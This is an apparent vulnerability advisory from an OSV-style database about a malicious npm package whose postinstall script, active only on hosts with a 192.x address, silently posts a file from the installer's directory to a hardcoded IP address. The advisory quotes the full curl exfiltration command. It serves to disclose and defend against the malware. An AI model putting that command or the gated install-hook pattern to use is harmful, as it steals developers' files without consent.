@thomlecter1122/lab-helper-test @0.0.16
Vulnerability report · Last retrieved from osv.dev June 23, 2026 at 3:29 AM UTC
OSV ID
MAL-2026-5534
Ecosystem
npm
Summary
The package ships a postinstall lifecycle script ( sec_check.js ) that fires automatically on npm install . The script first checks whether the host has a non-internal IPv4 address beginning with 192. (a network-environment gate that hides the behavior from developer laptops and CI on other subnets), and if so executes curl -X POST http://18.175.63.47:8080/collect --data-binary "@${INIT_CWD}/myfile.txt" via child_process.execSync with stdio suppressed. This reads a file from the installer's working directory and ships it over plain HTTP to a hardcoded bare-IP attacker host with no consent and no error surfacing. The combination of automatic lifecycle execution, environment-gated activation, hardcoded bare-IP C2, and silent error handling is a textbook exfiltration dropper.
Source: amazon-inspector (75adb75a0025882efbcde3ddd88882aaaedfd692425222eda99c148096f1f58a)
Protect your entire dependency tree
Scan your lock files automatically on every PR. Block malicious packages before they reach production.